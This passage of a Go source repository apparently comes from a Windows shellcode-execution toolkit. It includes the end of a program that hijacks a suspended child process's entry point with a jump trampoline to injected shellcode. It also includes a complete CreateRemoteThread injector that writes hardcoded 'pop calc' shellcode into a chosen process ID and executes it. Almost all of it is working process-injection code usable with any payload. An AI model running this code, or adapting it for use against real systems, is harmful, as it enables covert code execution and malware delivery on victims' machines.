// ULONG 225 | } 226 | 227 | // https://github.com/elastic/go-windows/blob/master/ntdll.go#L77 228 | type PROCESS_BASIC_INFORMATION struct { 229 | reserved1 uintptr // PVOID 230 | PebBaseAddress uintptr // PPEB 231 | reserved2 [2]uintptr // PVOID 232 | UniqueProcessId uintptr // ULONG_PTR 233 | InheritedFromUniqueProcessID uintptr // PVOID 234 | } 235 | 236 | if *debug { 237 | fmt.Println(fmt.Sprintf("[DEBUG]Calling NtQueryInformationProcess on %d...", procInfo.ProcessId)) 238 | } 239 | 240 | var processInformation PROCESS_BASIC_INFORMATION 241 | var returnLength uintptr 242 | ntStatus, _, errNtQueryInformationProcess := NtQueryInformationProcess.Call(uintptr(procInfo.Process), 0, uintptr(unsafe.Pointer(&processInformation)), unsafe.Sizeof(processInformation), returnLength) 243 | if errNtQueryInformationProcess != nil && errNtQueryInformationProcess.Error() != "The operation completed successfully." { 244 | log.Fatal(fmt.Sprintf("[!]Error calling NtQueryInformationProcess:\r\n\t%s", errNtQueryInformationProcess.Error())) 245 | } 246 | if ntStatus != 0 { 247 | if ntStatus == 3221225476 { 248 | log.Fatal("[!]Error calling NtQueryInformationProcess: STATUS_INFO_LENGTH_MISMATCH") // 0xc0000004 (3221225476) 249 | } 250 | fmt.Println(fmt.Sprintf("[!]NtQueryInformationProcess returned NTSTATUS: %x(%d)", ntStatus, ntStatus)) 251 | log.Fatal(fmt.Sprintf("[!]Error calling NtQueryInformationProcess:\r\n\t%s", syscall.Errno(ntStatus))) 252 | } 253 | if *verbose { 254 | fmt.Println("[-]Got PEB info from NtQueryInformationProcess") 255 | } 256 | 257 | // Read from PEB base address to populate the PEB structure 258 | // ReadProcessMemory 259 | /* 260 | BOOL ReadProcessMemory( 261 | HANDLE hProcess, 262 | LPCVOID lpBaseAddress, 263 | LPVOID lpBuffer, 264 | SIZE_T nSize, 265 | SIZE_T *lpNumberOfBytesRead 266 | ); 267 | */ 268 | 269 | ReadProcessMemory := kernel32.NewProc("ReadProcessMemory") 270 | 271 | if *debug { 272 | fmt.Println("[DEBUG]Calling ReadProcessMemory for PEB...") 273 | } 274 | 275 | var peb PEB 276 | var readBytes int32 277 | 278 | _, _, errReadProcessMemory := ReadProcessMemory.Call(uintptr(procInfo.Process), processInformation.PebBaseAddress, uintptr(unsafe.Pointer(&peb)), unsafe.Sizeof(peb), uintptr(unsafe.Pointer(&readBytes))) 279 | if errReadProcessMemory != nil && errReadProcessMemory.Error() != "The operation completed successfully." { 280 | log.Fatal(fmt.Sprintf("[!]Error calling ReadProcessMemory:\r\n\t%s", errReadProcessMemory.Error())) 281 | } 282 | if *verbose { 283 | fmt.Println(fmt.Sprintf("[-]ReadProcessMemory completed reading %d bytes for PEB", readBytes)) 284 | } 285 | if *debug { 286 | fmt.Println(fmt.Sprintf("[DEBUG]PEB: %+v", peb)) 287 | fmt.Println(fmt.Sprintf("[DEBUG]PEB ImageBaseAddress: 0x%x", peb.ImageBaseAddress)) 288 | } 289 | 290 | // Read the child program's DOS header and validate it is a MZ executable 291 | type IMAGE_DOS_HEADER struct { 292 | Magic uint16 // USHORT Magic number 293 | Cblp uint16 // USHORT Bytes on last page of file 294 | Cp uint16 // USHORT Pages in file 295 | Crlc uint16 // USHORT Relocations 296 | Cparhdr uint16 // USHORT Size of header in paragraphs 297 | MinAlloc uint16 // USHORT Minimum extra paragraphs needed 298 | MaxAlloc uint16 // USHORT Maximum extra paragraphs needed 299 | SS uint16 // USHORT Initial (relative) SS value 300 | SP uint16 // USHORT Initial SP value 301 | CSum uint16 // USHORT Checksum 302 | IP uint16 // USHORT Initial IP value 303 | CS uint16 // USHORT Initial (relative) CS value 304 | LfaRlc uint16 // USHORT File address of relocation table 305 | Ovno uint16 // USHORT Overlay number 306 | Res [4]uint16 // USHORT Reserved words 307 | OEMID uint16 // USHORT OEM identifier (for e_oeminfo) 308 | OEMInfo uint16 // USHORT OEM information; e_oemid specific 309 | Res2 [10]uint16 // USHORT Reserved words 310 | LfaNew int32 // LONG File address of new exe header 311 | } 312 | 313 | if *debug { 314 | fmt.Println("[DEBUG]Calling ReadProcessMemory for IMAGE_DOS_HEADER...") 315 | } 316 | 317 | var dosHeader IMAGE_DOS_HEADER 318 | var readBytes2 int32 319 | 320 | _, _, errReadProcessMemory2 := ReadProcessMemory.Call(uintptr(procInfo.Process), peb.ImageBaseAddress, uintptr(unsafe.Pointer(&dosHeader)), unsafe.Sizeof(dosHeader), uintptr(unsafe.Pointer(&readBytes2))) 321 | if errReadProcessMemory2 != nil && errReadProcessMemory2.Error() != "The operation completed successfully." { 322 | log.Fatal(fmt.Sprintf("[!]Error calling ReadProcessMemory:\r\n\t%s", errReadProcessMemory2.Error())) 323 | } 324 | if *verbose { 325 | fmt.Println(fmt.Sprintf("[-]ReadProcessMemory completed reading %d bytes for IMAGE_DOS_HEADER", readBytes2)) 326 | } 327 | if *debug { 328 | fmt.Println(fmt.Sprintf("[DEBUG]IMAGE_DOS_HEADER: %+v", dosHeader)) 329 | fmt.Println(fmt.Sprintf("[DEBUG]Magic: %s", string(dosHeader.Magic&0xff)+string(dosHeader.Magic>>8))) // LittleEndian 330 | fmt.Println(fmt.Sprintf("[DEBUG]PE header offset: 0x%x", dosHeader.LfaNew)) 331 | } 332 | 333 | // 23117 is the LittleEndian unsigned base10 representation of MZ 334 | // 0x5a4d is the LittleEndian unsigned base16 represenation of MZ 335 | if dosHeader.Magic != 23117 { 336 | log.Fatal(fmt.Sprintf("[!]DOS image header magic string was not MZ")) 337 | } 338 | 339 | // Read the child process's PE header signature to validate it is a PE 340 | if *debug { 341 | fmt.Println("[DEBUG]Calling ReadProcessMemory for PE Signature...") 342 | } 343 | var Signature uint32 344 | var readBytes3 int32 345 | 346 | _, _, errReadProcessMemory3 := ReadProcessMemory.Call(uintptr(procInfo.Process), peb.ImageBaseAddress+uintptr(dosHeader.LfaNew), uintptr(unsafe.Pointer(&Signature)), unsafe.Sizeof(Signature), uintptr(unsafe.Pointer(&readBytes3))) 347 | if errReadProcessMemory3 != nil && errReadProcessMemory3.Error() != "The operation completed successfully." { 348 | log.Fatal(fmt.Sprintf("[!]Error calling ReadProcessMemory:\r\n\t%s", errReadProcessMemory3.Error())) 349 | } 350 | if *verbose { 351 | fmt.Println(fmt.Sprintf("[-]ReadProcessMemory completed reading %d bytes for PE Signature", readBytes3)) 352 | 353 | } 354 | if *debug { 355 | fmt.Println(fmt.Sprintf("[DEUBG]PE Signature: 0x%x", Signature)) 356 | } 357 | 358 | // 17744 is Little Endian Unsigned 32-bit integer in decimal for PE (null terminated) 359 | // 0x4550 is Little Endian Unsigned 32-bit integer in hex for PE (null terminated) 360 | if Signature != 17744 { 361 | log.Fatal("[!]PE Signature string was not PE") 362 | } 363 | 364 | // Read the child process's PE file header 365 | /* 366 | typedef struct _IMAGE_FILE_HEADER { 367 | USHORT Machine; 368 | USHORT NumberOfSections; 369 | ULONG TimeDateStamp; 370 | ULONG PointerToSymbolTable; 371 | ULONG NumberOfSymbols; 372 | USHORT SizeOfOptionalHeader; 373 | USHORT Characteristics; 374 | } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; 375 | */ 376 | 377 | type IMAGE_FILE_HEADER struct { 378 | Machine uint16 379 | NumberOfSections uint16 380 | TimeDateStamp uint32 381 | PointerToSymbolTable uint32 382 | NumberOfSymbols uint32 383 | SizeOfOptionalHeader uint16 384 | Characteristics uint16 385 | } 386 | 387 | if *debug { 388 | fmt.Println("[DEBUG]Calling ReadProcessMemory for IMAGE_FILE_HEADER...") 389 | } 390 | var peHeader IMAGE_FILE_HEADER 391 | var readBytes4 int32 392 | 393 | _, _, errReadProcessMemory4 := ReadProcessMemory.Call(uintptr(procInfo.Process), peb.ImageBaseAddress+uintptr(dosHeader.LfaNew)+unsafe.Sizeof(Signature), uintptr(unsafe.Pointer(&peHeader)), unsafe.Sizeof(peHeader), uintptr(unsafe.Pointer(&readBytes4))) 394 | if errReadProcessMemory4 != nil && errReadProcessMemory4.Error() != "The operation completed successfully." { 395 | log.Fatal(fmt.Sprintf("[!]Error calling ReadProcessMemory:\r\n\t%s", errReadProcessMemory4.Error())) 396 | } 397 | if *verbose { 398 | fmt.Println(fmt.Sprintf("[-]ReadProcessMemory completed reading %d bytes for IMAGE_FILE_HEADER", readBytes4)) 399 | switch peHeader.Machine { 400 | case 34404: // 0x8664 401 | fmt.Println("[-]Machine type: IMAGE_FILE_MACHINE_AMD64 (x64)") 402 | case 332: // 0x14c 403 | fmt.Println("[-]Machine type: IMAGE_FILE_MACHINE_I386 (x86)") 404 | default: 405 | fmt.Println(fmt.Sprintf("[-]Machine type UNKOWN: 0x%x", peHeader.Machine)) 406 | } 407 | } 408 | if *debug { 409 | fmt.Println(fmt.Sprintf("[DEBUG]IMAGE_FILE_HEADER: %+v", peHeader)) 410 | fmt.Println(fmt.Sprintf("[DEBUG]Machine: 0x%x", peHeader.Machine)) 411 | } 412 | 413 | // Read the child process's PE optional header to find it's entry point 414 | /* 415 | https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_optional_header64 416 | typedef struct _IMAGE_OPTIONAL_HEADER64 { 417 | WORD Magic; 418 | BYTE MajorLinkerVersion; 419 | BYTE MinorLinkerVersion; 420 | DWORD SizeOfCode; 421 | DWORD SizeOfInitializedData; 422 | DWORD SizeOfUninitializedData; 423 | DWORD AddressOfEntryPoint; 424 | DWORD BaseOfCode; 425 | ULONGLONG ImageBase; 426 | DWORD SectionAlignment; 427 | DWORD FileAlignment; 428 | WORD MajorOperatingSystemVersion; 429 | WORD MinorOperatingSystemVersion; 430 | WORD MajorImageVersion; 431 | WORD MinorImageVersion; 432 | WORD MajorSubsystemVersion; 433 | WORD MinorSubsystemVersion; 434 | DWORD Win32VersionValue; 435 | DWORD SizeOfImage; 436 | DWORD SizeOfHeaders; 437 | DWORD CheckSum; 438 | WORD Subsystem; 439 | WORD DllCharacteristics; 440 | ULONGLONG SizeOfStackReserve; 441 | ULONGLONG SizeOfStackCommit; 442 | ULONGLONG SizeOfHeapReserve; 443 | ULONGLONG SizeOfHeapCommit; 444 | DWORD LoaderFlags; 445 | DWORD NumberOfRvaAndSizes; 446 | IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; 447 | } IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64; 448 | */ 449 | 450 | type IMAGE_OPTIONAL_HEADER64 struct { 451 | Magic uint16 452 | MajorLinkerVersion byte 453 | MinorLinkerVersion byte 454 | SizeOfCode uint32 455 | SizeOfInitializedData uint32 456 | SizeOfUninitializedData uint32 457 | AddressOfEntryPoint uint32 458 | BaseOfCode uint32 459 | ImageBase uint64 460 | SectionAlignment uint32 461 | FileAlignment uint32 462 | MajorOperatingSystemVersion uint16 463 | MinorOperatingSystemVersion uint16 464 | MajorImageVersion uint16 465 | MinorImageVersion uint16 466 | MajorSubsystemVersion uint16 467 | MinorSubsystemVersion uint16 468 | Win32VersionValue uint32 469 | SizeOfImage uint32 470 | SizeOfHeaders uint32 471 | CheckSum uint32 472 | Subsystem uint16 473 | DllCharacteristics uint16 474 | SizeOfStackReserve uint64 475 | SizeOfStackCommit uint64 476 | SizeOfHeapReserve uint64 477 | SizeOfHeapCommit uint64 478 | LoaderFlags uint32 479 | NumberOfRvaAndSizes uint32 480 | DataDirectory uintptr 481 | } 482 | 483 | /* 484 | https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_optional_header32 485 | typedef struct _IMAGE_OPTIONAL_HEADER { 486 | WORD Magic; 487 | BYTE MajorLinkerVersion; 488 | BYTE MinorLinkerVersion; 489 | DWORD SizeOfCode; 490 | DWORD SizeOfInitializedData; 491 | DWORD SizeOfUninitializedData; 492 | DWORD AddressOfEntryPoint; 493 | DWORD BaseOfCode; 494 | DWORD BaseOfData; 495 | DWORD ImageBase; 496 | DWORD SectionAlignment; 497 | DWORD FileAlignment; 498 | WORD MajorOperatingSystemVersion; 499 | WORD MinorOperatingSystemVersion; 500 | WORD MajorImageVersion; 501 | WORD MinorImageVersion; 502 | WORD MajorSubsystemVersion; 503 | WORD MinorSubsystemVersion; 504 | DWORD Win32VersionValue; 505 | DWORD SizeOfImage; 506 | DWORD SizeOfHeaders; 507 | DWORD CheckSum; 508 | WORD Subsystem; 509 | WORD DllCharacteristics; 510 | DWORD SizeOfStackReserve; 511 | DWORD SizeOfStackCommit; 512 | DWORD SizeOfHeapReserve; 513 | DWORD SizeOfHeapCommit; 514 | DWORD LoaderFlags; 515 | DWORD NumberOfRvaAndSizes; 516 | IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; 517 | } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; 518 | */ 519 | 520 | type IMAGE_OPTIONAL_HEADER32 struct { 521 | Magic uint16 522 | MajorLinkerVersion byte 523 | MinorLinkerVersion byte 524 | SizeOfCode uint32 525 | SizeOfInitializedData uint32 526 | SizeOfUninitializedData uint32 527 | AddressOfEntryPoint uint32 528 | BaseOfCode uint32 529 | BaseOfData uint32 // Different from 64 bit header 530 | ImageBase uint64 531 | SectionAlignment uint32 532 | FileAlignment uint32 533 | MajorOperatingSystemVersion uint16 534 | MinorOperatingSystemVersion uint16 535 | MajorImageVersion uint16 536 | MinorImageVersion uint16 537 | MajorSubsystemVersion uint16 538 | MinorSubsystemVersion uint16 539 | Win32VersionValue uint32 540 | SizeOfImage uint32 541 | SizeOfHeaders uint32 542 | CheckSum uint32 543 | Subsystem uint16 544 | DllCharacteristics uint16 545 | SizeOfStackReserve uint64 546 | SizeOfStackCommit uint64 547 | SizeOfHeapReserve uint64 548 | SizeOfHeapCommit uint64 549 | LoaderFlags uint32 550 | NumberOfRvaAndSizes uint32 551 | DataDirectory uintptr 552 | } 553 | 554 | if *debug { 555 | fmt.Println("[DEBUG]Calling ReadProcessMemory for IMAGE_OPTIONAL_HEADER...") 556 | } 557 | 558 | var optHeader64 IMAGE_OPTIONAL_HEADER64 559 | var optHeader32 IMAGE_OPTIONAL_HEADER32 560 | var errReadProcessMemory5 error 561 | var readBytes5 int32 562 | 563 | if peHeader.Machine == 34404 { // 0x8664 564 | _, _, errReadProcessMemory5 = ReadProcessMemory.Call(uintptr(procInfo.Process), peb.ImageBaseAddress+uintptr(dosHeader.LfaNew)+unsafe.Sizeof(Signature)+unsafe.Sizeof(peHeader), uintptr(unsafe.Pointer(&optHeader64)), unsafe.Sizeof(optHeader64), uintptr(unsafe.Pointer(&readBytes5))) 565 | } else if peHeader.Machine == 332 { // 0x14c 566 | _, _, errReadProcessMemory5 = ReadProcessMemory.Call(uintptr(procInfo.Process), peb.ImageBaseAddress+uintptr(dosHeader.LfaNew)+unsafe.Sizeof(Signature)+unsafe.Sizeof(peHeader), uintptr(unsafe.Pointer(&optHeader32)), unsafe.Sizeof(optHeader32), uintptr(unsafe.Pointer(&readBytes5))) 567 | } else { 568 | log.Fatal(fmt.Sprintf("[!]Unknow IMAGE_OPTIONAL_HEADER type for machine type: 0x%x", peHeader.Machine)) 569 | } 570 | 571 | if errReadProcessMemory5 != nil && errReadProcessMemory5.Error() != "The operation completed successfully." { 572 | log.Fatal(fmt.Sprintf("[!]Error calling ReadProcessMemory:\r\n\t%s", errReadProcessMemory5.Error())) 573 | } 574 | if *verbose { 575 | fmt.Println(fmt.Sprintf("[-]ReadProcessMemory completed reading %d bytes for IMAGE_OPTIONAL_HEADER", readBytes5)) 576 | } 577 | if *debug { 578 | if peHeader.Machine == 332 { // 0x14c 579 | fmt.Println(fmt.Sprintf("[DEBUG]IMAGE_OPTIONAL_HEADER32: %+v", optHeader32)) 580 | fmt.Println(fmt.Sprintf("\t[DEBUG]ImageBase: 0x%x", optHeader32.ImageBase)) 581 | fmt.Println(fmt.Sprintf("\t[DEBUG]AddressOfEntryPoint (relative): 0x%x", optHeader32.AddressOfEntryPoint)) 582 | fmt.Println(fmt.Sprintf("\t[DEBUG]AddressOfEntryPoint (absolute): 0x%x", peb.ImageBaseAddress+uintptr(optHeader32.AddressOfEntryPoint))) 583 | } 584 | if peHeader.Machine == 34404 { // 0x8664 585 | fmt.Println(fmt.Sprintf("[DEBUG]IMAGE_OPTIONAL_HEADER64: %+v", optHeader64)) 586 | fmt.Println(fmt.Sprintf("\t[DEBUG]ImageBase: 0x%x", optHeader64.ImageBase)) 587 | fmt.Println(fmt.Sprintf("\t[DEBUG]AddressOfEntryPoint (relative): 0x%x", optHeader64.AddressOfEntryPoint)) 588 | fmt.Println(fmt.Sprintf("\t[DEBUG]AddressOfEntryPoint (absolute): 0x%x", peb.ImageBaseAddress+uintptr(optHeader64.AddressOfEntryPoint))) 589 | } 590 | } 591 | 592 | // Overwrite the value at AddressofEntryPoint field with trampoline to load the shellcode address in RAX/EAX and jump to it 593 | var ep uintptr 594 | if peHeader.Machine == 34404 { // 0x8664 x64 595 | ep = peb.ImageBaseAddress + uintptr(optHeader64.AddressOfEntryPoint) 596 | } else if peHeader.Machine == 332 { // 0x14c x86 597 | ep = peb.ImageBaseAddress + uintptr(optHeader32.AddressOfEntryPoint) 598 | } else { 599 | log.Fatal(fmt.Sprintf("[!]Unknow IMAGE_OPTIONAL_HEADER type for machine type: 0x%x", peHeader.Machine)) 600 | } 601 | 602 | var epBuffer []byte 603 | var shellcodeAddressBuffer []byte 604 | // x86 - 0xb8 = mov eax 605 | // x64 - 0x48 = rex (declare 64bit); 0xb8 = mov eax 606 | if peHeader.Machine == 34404 { // 0x8664 x64 607 | epBuffer = append(epBuffer, byte(0x48)) 608 | epBuffer = append(epBuffer, byte(0xb8)) 609 | shellcodeAddressBuffer = make([]byte, 8) // 8 bytes for 64-bit address 610 | binary.LittleEndian.PutUint64(shellcodeAddressBuffer, uint64(addr)) 611 | epBuffer = append(epBuffer, shellcodeAddressBuffer...) 612 | } else if peHeader.Machine == 332 { // 0x14c x86 613 | epBuffer = append(epBuffer, byte(0xb8)) 614 | shellcodeAddressBuffer = make([]byte, 4) // 4 bytes for 32-bit address 615 | binary.LittleEndian.PutUint32(shellcodeAddressBuffer, uint32(addr)) 616 | epBuffer = append(epBuffer, shellcodeAddressBuffer...) 617 | } else { 618 | log.Fatal(fmt.Sprintf("[!]Unknow IMAGE_OPTIONAL_HEADER type for machine type: 0x%x", peHeader.Machine)) 619 | } 620 | 621 | // 0xff ; 0xe0 = jmp [r|e]ax 622 | epBuffer = append(epBuffer, byte(0xff)) 623 | epBuffer = append(epBuffer, byte(0xe0)) 624 | 625 | if *debug { 626 | fmt.Println(fmt.Sprintf("[DEBUG]Calling WriteProcessMemory to overwrite AddressofEntryPoint at 0x%x with trampoline: 0x%x...", ep, epBuffer)) 627 | } 628 | 629 | _, _, errWriteProcessMemory2 := WriteProcessMemory.Call(uintptr(procInfo.Process), ep, uintptr(unsafe.Pointer(&epBuffer[0])), uintptr(len(epBuffer))) 630 | 631 | if errWriteProcessMemory2 != nil && errWriteProcessMemory2.Error() != "The operation completed successfully." { 632 | log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory2.Error())) 633 | } 634 | if *verbose { 635 | fmt.Println("[-]Successfully overwrote the AddressofEntryPoint") 636 | } 637 | 638 | // Resume the child process 639 | if *debug { 640 | fmt.Println("[DEBUG]Calling ResumeThread...") 641 | } 642 | _, errResumeThread := windows.ResumeThread(procInfo.Thread) 643 | if errResumeThread != nil { 644 | log.Fatal(fmt.Sprintf("[!]Error calling ResumeThread:\r\n%s", errResumeThread.Error())) 645 | } 646 | if *verbose { 647 | fmt.Println("[+]Process resumed and shellcode executed") 648 | } 649 | 650 | // Close the handle to the child process 651 | if *debug { 652 | fmt.Println("[DEBUG]Calling CloseHandle on child process...") 653 | } 654 | errCloseProcHandle := windows.CloseHandle(procInfo.Process) 655 | if errCloseProcHandle != nil { 656 | log.Fatal(fmt.Sprintf("[!]Error closing the child process handle:\r\n\t%s", errCloseProcHandle.Error())) 657 | } 658 | 659 | // Close the hand to the child process thread 660 | if *debug { 661 | fmt.Println("[DEBUG]Calling CloseHandle on child process thread...") 662 | } 663 | errCloseThreadHandle := windows.CloseHandle(procInfo.Thread) 664 | if errCloseThreadHandle != nil { 665 | log.Fatal(fmt.Sprintf("[!]Error closing the child process thread handle:\r\n\t%s", errCloseThreadHandle.Error())) 666 | } 667 | 668 | // Close the write handle the anonymous STDOUT pipe 669 | errCloseStdOutWrite := windows.CloseHandle(stdOutWrite) 670 | if errCloseStdOutWrite != nil { 671 | log.Fatal(fmt.Sprintf("[!]Error closing STDOUT pipe write handle:\r\n\t%s", errCloseStdOutWrite.Error())) 672 | } 673 | 674 | // Close the read handle to the anonymous STDIN pipe 675 | errCloseStdInRead := windows.CloseHandle(stdInRead) 676 | if errCloseStdInRead != nil { 677 | log.Fatal(fmt.Sprintf("[!]Error closing the STDIN pipe read handle:\r\n\t%s", errCloseStdInRead.Error())) 678 | } 679 | 680 | // Close the write handle to the anonymous STDERR pipe 681 | errCloseStdErrWrite := windows.CloseHandle(stdErrWrite) 682 | if errCloseStdErrWrite != nil { 683 | log.Fatal(fmt.Sprintf("[!]err closing STDERR pipe write handle:\r\n\t%s", errCloseStdErrWrite.Error())) 684 | } 685 | 686 | // Read STDOUT from child process 687 | /* 688 | BOOL ReadFile( 689 | HANDLE hFile, 690 | LPVOID lpBuffer, 691 | DWORD nNumberOfBytesToRead, 692 | LPDWORD lpNumberOfBytesRead, 693 | LPOVERLAPPED lpOverlapped 694 | ); 695 | */ 696 | nNumberOfBytesToRead := make([]byte, 1) 697 | var stdOutBuffer []byte 698 | var stdOutDone uint32 699 | var stdOutOverlapped windows.Overlapped 700 | if *debug { 701 | fmt.Println("[DEBUG]Calling ReadFile on STDOUT pipe...") 702 | } 703 | for { 704 | errReadFileStdOut := windows.ReadFile(stdOutRead, nNumberOfBytesToRead, &stdOutDone, &stdOutOverlapped) 705 | if errReadFileStdOut != nil && errReadFileStdOut.Error() != "The pipe has been ended." { 706 | log.Fatal(fmt.Sprintf("[!]Error reading from STDOUT pipe:\r\n\t%s", errReadFileStdOut.Error())) 707 | } 708 | if int(stdOutDone) == 0 { 709 | break 710 | } 711 | for _, b := range nNumberOfBytesToRead { 712 | stdOutBuffer = append(stdOutBuffer, b) 713 | } 714 | } 715 | if *verbose { 716 | fmt.Println(fmt.Sprintf("[-]Finished reading %d bytes from STDOUT", len(stdOutBuffer))) 717 | } 718 | 719 | // Read STDERR from child process 720 | var stdErrBuffer []byte 721 | var stdErrDone uint32 722 | var stdErrOverlapped windows.Overlapped 723 | if *debug { 724 | fmt.Println("[DEBUG]Calling ReadFile on STDERR pipe...") 725 | } 726 | for { 727 | errReadFileStdErr := windows.ReadFile(stdErrRead, nNumberOfBytesToRead, &stdErrDone, &stdErrOverlapped) 728 | if errReadFileStdErr != nil && errReadFileStdErr.Error() != "The pipe has been ended." { 729 | log.Fatal(fmt.Sprintf("[!]Error reading from STDOUT pipe:\r\n\t%s", errReadFileStdErr.Error())) 730 | } 731 | if int(stdErrDone) == 0 { 732 | break 733 | } 734 | for _, b := range nNumberOfBytesToRead { 735 | stdErrBuffer = append(stdErrBuffer, b) 736 | } 737 | } 738 | if *verbose { 739 | fmt.Println(fmt.Sprintf("[-]Finished reading %d bytes from STDERR", len(stdErrBuffer))) 740 | } 741 | 742 | // Write the data collected from the childprocess' STDOUT to the parent process' STOUTOUT 743 | if len(stdOutBuffer) > 0 { 744 | fmt.Println(fmt.Sprintf("[+]Child process STDOUT:\r\n%s", string(stdOutBuffer))) 745 | } 746 | if len(stdErrBuffer) > 0 { 747 | fmt.Println(fmt.Sprintf("[!]Child process STDERR:\r\n%s", string(stdErrBuffer))) 748 | } 749 | } 750 | 751 | // export GOOS=windows GOARCH=amd64;go build -o goCreateProcessWithPipe.exe cmd/CreateProcessWithPipe/main.go 752 | // test STDERR go run .\cmd\CreateProcessWithPipe\main.go -verbose -debug -program "C:\Windows\System32\cmd.exe" -args "/c whoami /asdfasdf" 753 | -------------------------------------------------------------------------------- /cmd/CreateRemoteThread/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | /* 4 | This program executes shellcode in a remote process using the following steps 5 | 1. Get a handle to the target process 6 | 1. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write 7 | 2. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process 8 | 3. Change the memory page permissions to Execute/Read with VirtualProtectEx 9 | 4. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread 10 | 5. Close the handle to the remote process 11 | 12 | This program leverages the functions from golang.org/x/sys/windows WHERE POSSIBLE to call Windows procedures instead of manually loading them 13 | */ 14 | 15 | package main 16 | 17 | import ( 18 | "encoding/hex" 19 | "flag" 20 | "fmt" 21 | "log" 22 | "unsafe" 23 | 24 | // Sub Repositories 25 | "golang.org/x/sys/windows" 26 | ) 27 | 28 | func main() { 29 | verbose := flag.Bool("verbose", false, "Enable verbose output") 30 | debug := flag.Bool("debug", false, "Enable debug output") 31 | // To hardcode the Process Identifier (PID), change 0 to the PID of the target process 32 | pid := flag.Int("pid", 0, "Process ID to inject shellcode into") 33 | flag.Parse() 34 | 35 | // Pop Calc Shellcode 36 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 37 | if errShellcode != nil { 38 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 39 | } 40 | 41 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 42 | 43 | VirtualAllocEx := kernel32.NewProc("VirtualAllocEx") 44 | VirtualProtectEx := kernel32.NewProc("VirtualProtectEx") 45 | WriteProcessMemory := kernel32.NewProc("WriteProcessMemory") 46 | CreateRemoteThreadEx := kernel32.NewProc("CreateRemoteThreadEx") 47 | 48 | if *debug { 49 | fmt.Println(fmt.Sprintf("[DEBUG]Getting a handle to Process ID (PID) %d...", *pid)) 50 | } 51 | pHandle, errOpenProcess := windows.OpenProcess(windows.PROCESS_CREATE_THREAD|windows.PROCESS_VM_OPERATION|windows.PROCESS_VM_WRITE|windows.PROCESS_VM_READ|windows.PROCESS_QUERY_INFORMATION, false, uint32(*pid)) 52 | 53 | if errOpenProcess != nil { 54 | log.Fatal(fmt.Sprintf("[!]Error calling OpenProcess:\r\n%s", errOpenProcess.Error())) 55 | } 56 | if *verbose { 57 | fmt.Println(fmt.Sprintf("[-]Successfully got a handle to process %d", *pid)) 58 | } 59 | 60 | if *debug { 61 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualAllocEx on PID %d...", *pid)) 62 | } 63 | addr, _, errVirtualAlloc := VirtualAllocEx.Call(uintptr(pHandle), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 64 | 65 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 66 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 67 | } 68 | 69 | if addr == 0 { 70 | log.Fatal("[!]VirtualAllocEx failed and returned 0") 71 | } 72 | if *verbose { 73 | fmt.Println(fmt.Sprintf("[-]Successfully allocated memory in PID %d", *pid)) 74 | } 75 | 76 | if *debug { 77 | fmt.Println(fmt.Sprintf("[DEBUG]Calling WriteProcessMemory on PID %d...", *pid)) 78 | } 79 | _, _, errWriteProcessMemory := WriteProcessMemory.Call(uintptr(pHandle), addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 80 | 81 | if errWriteProcessMemory != nil && errWriteProcessMemory.Error() != "The operation completed successfully." { 82 | log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())) 83 | } 84 | if *verbose { 85 | fmt.Println(fmt.Sprintf("[-]Successfully wrote shellcode to PID %d", *pid)) 86 | } 87 | 88 | if *debug { 89 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualProtectEx on PID %d...", *pid)) 90 | } 91 | oldProtect := windows.PAGE_READWRITE 92 | _, _, errVirtualProtectEx := VirtualProtectEx.Call(uintptr(pHandle), addr, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 93 | if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 94 | log.Fatal(fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())) 95 | } 96 | if *verbose { 97 | fmt.Println(fmt.Sprintf("[-]Successfully change memory permissions to PAGE_EXECUTE_READ in PID %d", *pid)) 98 | } 99 | 100 | if *debug { 101 | fmt.Println(fmt.Sprintf("[DEBUG]Call CreateRemoteThreadEx on PID %d...", *pid)) 102 | } 103 | _, _, errCreateRemoteThreadEx := CreateRemoteThreadEx.Call(uintptr(pHandle), 0, 0, addr, 0, 0, 0) 104 | if errCreateRemoteThreadEx != nil && errCreateRemoteThreadEx.Error() != "The operation completed successfully." { 105 | log.Fatal(fmt.Sprintf("[!]Error calling CreateRemoteThreadEx:\r\n%s", errCreateRemoteThreadEx.Error())) 106 | } 107 | if *verbose { 108 | fmt.Println(fmt.Sprintf("[+]Successfully create a remote thread in PID %d", *pid)) 109 | } 110 | 111 | if *debug { 112 | fmt.Println(fmt.Sprintf("[DEBUG]Calling CloseHandle on PID %d...", *pid)) 113 | } 114 | errCloseHandle 